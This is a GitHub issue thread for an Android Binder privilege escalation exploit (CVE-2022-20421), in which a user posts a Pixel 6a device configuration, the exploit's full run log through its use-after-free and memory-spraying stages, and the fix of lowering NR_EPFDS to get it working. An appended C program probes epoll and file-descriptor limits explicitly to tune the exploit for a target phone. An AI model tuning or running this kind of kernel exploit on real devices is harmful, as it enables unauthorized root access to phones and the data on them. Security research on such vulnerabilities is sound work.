0xkol / badspin

Bad Spin: Android Binder Privilege Escalation Exploit (CVE-2022-20421)
MIT License

Pixel 6A... Failed ! #5

Closed AkimSALADIN closed 1 year ago

AkimSALADIN commented 1 year ago

Device = Pixel 6A
Build Number = SD2A.220123.051.A3
Android = 12
Kernel = 5.10.66
Security Patch = 4/2022

// dev_config.h
{
        /* BlueJay 12.0.0 (SD2A.220123.051.A3, Apr 2022) */
        .name = "Google Pixel 6a",
        .model = "Pixel 6a",
        .android_version = 12,
        .android_security_patch.year = 2022,
        .android_security_patch.month = 4,
        .kernel_version = KERNEL_VERSION(5, 10, 66),
        .kimg_to_lm = pixel_kimg_to_lm,
        .find_kbase = noop_kbase,
}
bluejay:/ $ uname -a
Linux localhost 5.10.66-android12-9-00007-g66c74c58ab38-ab8262750 #1 SMP PREEMPT Mon Mar 7 01:27:36 UTC 2022 aarch64

Output from adb shell:

==========================================
Bad Spin Exploit (CVE-2022-20421) by 0xkol
==========================================
[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[7029:7029] New binder client: A
[7031:7031] New binder client: C
[7030:7030] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
Txn size: 1023.562500KB
B: Destroying
B: Finish. 
C: Wait for A...
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
    Testing ptmx 0 (fd 4)
        Reading ptmx 0
    Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
    Joining blocker threads...
    All blocker threads joined.
offsetof(inner_lock, binder_proc) = 576
[x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[pipe_process:7086] Pinned to CPU 0
[graveyard_process] pid = 7085
[pipe_process:7089] Pinned to CPU 3
[pipe_process:7088] Pinned to CPU 2
[pipe_process:7090] Pinned to CPU 4
[pipe_process:7087] Pinned to CPU 1
[pipe_process:7094] Pinned to CPU 7
[pipe_process:7093] Pinned to CPU 6
[pipe_process:7091] Pinned to CPU 5
[fd_master_process] pid = 7095
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:7151] 30000 files sprayed
[shaper_process:7149] 30000 files sprayed
[shaper_process:7152] 30000 files sprayed
[shaper_process:7150] 30000 files sprayed
[shaper_process:7153] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=7154
[timer_master_process] Wait for C to enter spin_lock()
[7156:7156] New binder client: B
[7159:7159] New binder client: C
[7155:7155] New binder client: A
C: lookup A => handle = 2
A: lookup B => handle = 2
B: Searching for magic badcab1ebadcab1e....
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
Txn size: 1023.562500KB
B: Destroying
B: Finish. 
C: Wait for A...
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev))

It gets stuck here, and if I force-close the command (Ctrl+C), the phone stays stuck on that screen and freezes after a few seconds, so I need to force a shutdown with the button combo.

AkimSALADIN commented 1 year ago

We solved this error by reducing the value of "NR_EPFDS" from 500 to 200.

Thank you @0xkol for your help and your support.
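The thread records that the run died inside SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev)) and that lowering NR_EPFDS from 500 to 200 fixed it, but not which errno was hit. The program below is an added diagnostic, not code from badspin or from 0xkol, for measuring where a given device's epoll budget runs out before the exploit is started. It assumes Linux and that the two limits worth checking are the per-process RLIMIT_NOFILE (epoll_create1 fails with EMFILE) and the per-user fs.epoll.max_user_watches sysctl (epoll_ctl ADD fails with ENOSPC, or ENOMEM if the kernel cannot allocate the watch); the eventfd targets, the function names and the default of 500 epoll instances (taken from the thread's NR_EPFDS) are the example's own choices.

```c
/*
 * Added diagnostic, not part of badspin: count how many epoll instances and
 * watches this process can create before the kernel refuses, and report the
 * first failing call and its errno. Assumes Linux.
 */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/eventfd.h>
#include <sys/resource.h>
#include <unistd.h>

struct epoll_probe {
    int epfds_created;     /* epoll instances successfully created */
    long watches_added;    /* successful EPOLL_CTL_ADD calls */
    int fail_errno;        /* errno of the first failure, 0 if none */
    const char *fail_call; /* name of the call that failed, NULL if none */
};

/* Soft RLIMIT_NOFILE of this process, or -1 on error. */
long nofile_soft_limit(void)
{
    struct rlimit rl;
    return getrlimit(RLIMIT_NOFILE, &rl) < 0 ? -1 : (long)rl.rlim_cur;
}

/* Per-user epoll watch budget (fs.epoll.max_user_watches), -1 if unreadable. */
long epoll_max_user_watches(void)
{
    FILE *f = fopen("/proc/sys/fs/epoll/max_user_watches", "r");
    long v = -1;
    if (!f) return -1;
    if (fscanf(f, "%ld", &v) != 1) v = -1;
    fclose(f);
    return v;
}

/* Create nr_epfds epoll instances and register nr_targets eventfds in each
 * (nr_epfds * nr_targets watches in total). Stops at the first failure,
 * records it, and releases every fd before returning. */
struct epoll_probe probe_epoll_limits(int nr_epfds, int nr_targets)
{
    struct epoll_probe r = { 0, 0, 0, NULL };
    int *epfds = calloc(nr_epfds > 0 ? nr_epfds : 1, sizeof *epfds);
    int *targets = calloc(nr_targets > 0 ? nr_targets : 1, sizeof *targets);
    int nt = 0;

    if (!epfds || !targets) { r.fail_errno = ENOMEM; r.fail_call = "calloc"; goto out; }
    for (; nt < nr_targets; nt++) {
        targets[nt] = eventfd(0, EFD_CLOEXEC);
        if (targets[nt] < 0) { r.fail_errno = errno; r.fail_call = "eventfd"; goto out; }
    }
    for (int i = 0; i < nr_epfds; i++) {
        epfds[i] = epoll_create1(EPOLL_CLOEXEC);
        if (epfds[i] < 0) { r.fail_errno = errno; r.fail_call = "epoll_create1"; goto out; }
        r.epfds_created++;
        for (int t = 0; t < nt; t++) {
            struct epoll_event ev = { .events = EPOLLIN, .data.fd = targets[t] };
            if (epoll_ctl(epfds[i], EPOLL_CTL_ADD, targets[t], &ev) < 0) {
                r.fail_errno = errno; r.fail_call = "epoll_ctl"; goto out;
            }
            r.watches_added++;
        }
    }
out:
    for (int i = 0; epfds && i < r.epfds_created; i++) close(epfds[i]);
    for (int t = 0; targets && t < nt; t++) close(targets[t]);
    free(epfds);
    free(targets);
    return r;
}

/* Same probe under a temporarily lowered soft RLIMIT_NOFILE (restored
 * afterwards), to show the EMFILE failure mode on a box with generous limits. */
struct epoll_probe probe_with_nofile_limit(rlim_t soft, int nr_epfds, int nr_targets)
{
    struct epoll_probe r = { 0, 0, 0, NULL };
    struct rlimit saved, tmp;
    if (getrlimit(RLIMIT_NOFILE, &saved) < 0) { r.fail_errno = errno; r.fail_call = "getrlimit"; return r; }
    tmp = saved;
    tmp.rlim_cur = soft < saved.rlim_max ? soft : saved.rlim_max;
    if (setrlimit(RLIMIT_NOFILE, &tmp) < 0) { r.fail_errno = errno; r.fail_call = "setrlimit"; return r; }
    r = probe_epoll_limits(nr_epfds, nr_targets);
    setrlimit(RLIMIT_NOFILE, &saved); /* restore the original soft limit */
    return r;
}

int main(int argc, char **argv)
{
    int nr_epfds = argc > 1 ? atoi(argv[1]) : 500; /* NR_EPFDS value from the thread */
    int nr_targets = argc > 2 ? atoi(argv[2]) : 1;
    printf("RLIMIT_NOFILE (soft) = %ld\n", nofile_soft_limit());
    printf("fs.epoll.max_user_watches = %ld\n", epoll_max_user_watches());
    struct epoll_probe r = probe_epoll_limits(nr_epfds, nr_targets);
    printf("epfds created: %d, watches added: %ld\n", r.epfds_created, r.watches_added);
    if (r.fail_errno)
        printf("first failure: %s: %s (errno %d)\n", r.fail_call, strerror(r.fail_errno), r.fail_errno);
    return r.fail_errno ? 1 : 0;
}
```

Build it with the NDK (or any aarch64 cross compiler), push it with adb, and run it as the same unprivileged shell user the exploit runs as; passing the NR_EPFDS you intend to use as the first argument tells you whether the device can hold that many epoll instances at all, and the failing call plus errno tells you which limit to lower or which constant to shrink.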